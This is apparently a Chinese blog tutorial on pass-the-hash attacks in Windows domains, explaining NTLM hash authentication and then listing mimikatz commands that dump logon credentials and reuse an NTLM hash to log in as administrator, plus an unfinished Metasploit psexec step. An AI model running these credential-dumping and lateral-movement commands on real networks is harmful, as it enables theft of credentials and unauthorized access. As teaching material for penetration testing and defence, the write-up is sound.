页首Html代码

HASH传递攻击

一、HASH传递基础

1.1 HASH传递攻击介绍

在域环境中,检测密码不是先解密HASH再验证密码是否正确的,而是通过验证HASH是否相同来进行验证的,也就是说我们可以通过获取HASH来伪造管理管员的账号密码登录,这就是HASH传递攻击,也叫PTH。

用户登录计算机时使用的大都是域账号,计算机在安装时可能会使用相同的本地管理员账号和密码,如果账号密码是相同的,攻击者就能使用HASH传递的方法登录内网中其他的计算机。

1.2 HASH基础

windows中哈希分为LM哈希和NTLM哈希,NTLM全称是 NT LAN Manager 这是一种网络认证的协议。在本地认证的过程中,其实就是将用户输入的密码转为NTLM HASH与SAM中的NTLM HASH进行对比。

如果2008之前的系统打了KB2871997的补丁的话是获取不到明文的,2008以后的系统都是获取不到明文密码。

二、HASH传递利用

1.1 mimikatz HASH传递

  1. 首先我们需要获取到本地获取到了本地管理员的执行权限。
    privilege::debug
    sekurlsa::logonpasswords
  2. 复制NTLM HASH的值,在MIMIKATZ下执行以下命令,完成之后会弹出一个CMD的命令。
    sekurlsa::pth /user:administrator /domain:HACK.COM /ntlm:a836e94468ed8132c1eff0bf86c7ffcf

1.2 MSF HASH传递

  1. 首先要在MSF里面拥有一个管理员的shell
  2. 执行以下命令,用来hash传递
    use exploit/windows/smb/psexec
posted @   与或非丶  阅读(390)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 25岁的心里话
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!
· 零经验选手,Compose 一天开发一款小游戏!
点击右上角即可分享
微信分享提示

目录导航